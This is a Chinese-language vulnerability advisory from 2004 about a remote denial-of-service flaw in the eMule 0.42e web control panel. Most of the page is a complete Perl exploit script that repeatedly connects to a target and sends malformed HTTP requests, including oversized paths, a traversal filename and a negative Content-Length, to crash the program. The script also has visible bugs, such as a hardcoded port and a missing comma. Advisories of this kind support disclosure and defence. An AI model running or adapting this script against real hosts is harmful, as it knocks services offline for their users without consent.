安全研究
安全漏洞
EMule Web控制面板远程拒绝服务漏洞
发布日期:2004-05-10
更新日期:2004-05-14
受影响系统:
Emule Emule 0.42e描述:
BUGTRAQ ID: 10317
eMule是一款可靠的点对点档案共享客户端。
eMule Web控制面板不正确处理畸形请求,远程攻击者可以利用这个漏洞对应用程序进行拒绝服务攻击。
提交畸形GET请求,可使eMule应用程序崩溃。
<*来源:Rafel Ivgi, The-Insider (nuritrv18@bezeqint.net)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
system("cls");
# Emule 0.42e Remote Denial Of Service Exploit
# Coded by Rafel Ivgi, The-Insider: http://theinsider.deep-ice.com
# usage: perl emule042e.pl <host> <port> <how many times>
use IO::Socket;
my $host = $ARGV[0];
my $port = $ARGV[1];
my $times = $ARGV[2];
if ($host)
{
unless($port) { $port="4711";}
unless($times) { $times="50";}
{
print "Emule 0.42e Remote Denial Of Service Exploit
Coded by The-Insider\n\n";
print "[+] Connecting to target $host:$port\n";
for $i (1..$times) {
$remote=IO::Socket::INET->new(Proto =>"tcp",
PeerAddr => $host,
PeerPort => 80,
Type => SOCK_STREAM
Timeout => 8);
unless ($remote)
{
die "can't connect to $host"
}
print "[+] Connected to target $host:$port\n";
print "[+] Sending Request\n";
$remote ->autoflush(1);
print $remote "GET / HTTP/1.1
Content-Disposition: form-data; name=\"file\";
filename=\"../../../file.txt\"
";
print $remote "POST / HTTP/1.0
Content-Length: 10
123456789
";
print $remote "POST / HTTP/1.1
Content-Length: -1
";
print $remote "GET /%%%%%%%%%%%% HTTP/1.0
";
print $remote "index.htm
";
print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
";
print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa
";
print $remote "GET c:\
";
print $remote "GET
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
";
while(<$remote>)
{
$cool .= $_;
if ($cool =~ /Server:/i)
{
close $cool;
-close $remote;
}
}
print "[+] Target Demolished.\n";
}}}
else
{
die "\nEmule 0.42e Remote Denial Of Service Exploit
Coded by Rafel Ivgi, The-Insider: http://theinsider.deep-ice.com
usage: perl emule042e.pl <host> <port> <how many times>\n\n";
}
建议:
厂商补丁:
Emule
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://emule-project.net/
浏览次数:3311
严重程度:0(网友投票)
绿盟科技给您安全的保障